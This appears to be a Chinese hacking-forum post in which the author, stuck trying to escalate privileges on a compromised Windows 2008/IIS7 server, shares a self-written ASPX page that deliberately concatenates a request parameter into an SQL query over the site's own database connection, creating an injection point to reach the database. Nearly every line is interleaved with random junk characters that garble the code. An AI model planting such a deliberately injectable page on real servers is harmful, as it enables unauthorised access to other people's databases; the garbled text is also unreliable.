昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。# R! b! T$ ^4 p
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
8 `/ K6 o0 ?% k# u; i代码量不多,自己写个拉倒了。烦死了。- B2 j& y4 U3 a. M
+ }4 p q: `4 M3 P6 f" i
$ h9 R. ?" }; k6 k Y0 B" g2 @8 A, C<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1 |/ d. t% I6 A3 t6 `<html xmlns="http://www.w3.org/1999/xhtml">
8 m" {, c, N- l6 S. b<head runat="server">
2 ?3 a( E" z* H, P, o2 x) M <title>暗影aspx构造注射专用页面</title>
5 M8 d$ ]3 _# E</head>* k! s* ~- F* r/ F3 X# I
<body>) G/ i0 N/ f C; W9 [3 ^
<form id="form1" runat="server">: A# ^5 L1 {6 A4 X6 Z' A
<div>
! L2 Y6 h& C3 B7 [" a! s9 u <script language="c#" runat="server">, D3 N. w8 V% v. Z( g. {# r* f
5 B. H9 ~6 k& n# X% g, o void page_init(object sender, EventArgs e)! l* H# ~( d- C' P, w
{
1 y4 \- m; M! x( o' [
8 O7 D( `" D: g' H, \ E2 L System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();, W* M( s& p& ^5 M" h' z5 |; K0 T
2 I) U9 @( u2 a7 d$ s conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
( c3 {5 z1 X" F; v- [) d+ k conn.Open();
" m# N$ b+ ^) A
5 R; z( j+ O' ] string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1$ c% s8 I$ ~! y
? T- B9 o1 \' f3 a System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn); ^* i! B, R4 L. r# j2 @8 e
int x = command.ExecuteNonQuery();9 b6 y& h( J! B+ I
Response.Write(i+"\n");
0 G: Z4 i$ c1 O( p. E% C9 O0 | Response.Write(x);8 k* B2 \5 F3 d( v1 x: w
conn.Close();, O! R9 x9 L. E
}! }% [+ B8 H+ ^
: a/ U/ Q0 m* o0 T
</script>; W! J5 D) }6 P$ [- ?
</div>
2 N# x0 T' q" Y3 L D7 j: x4 f </form>
& L- U% [& R, q, Y2 j# Z4 S0 K</body>! S( c4 Q, S8 y+ s
</html>
( G3 x' R$ n4 W |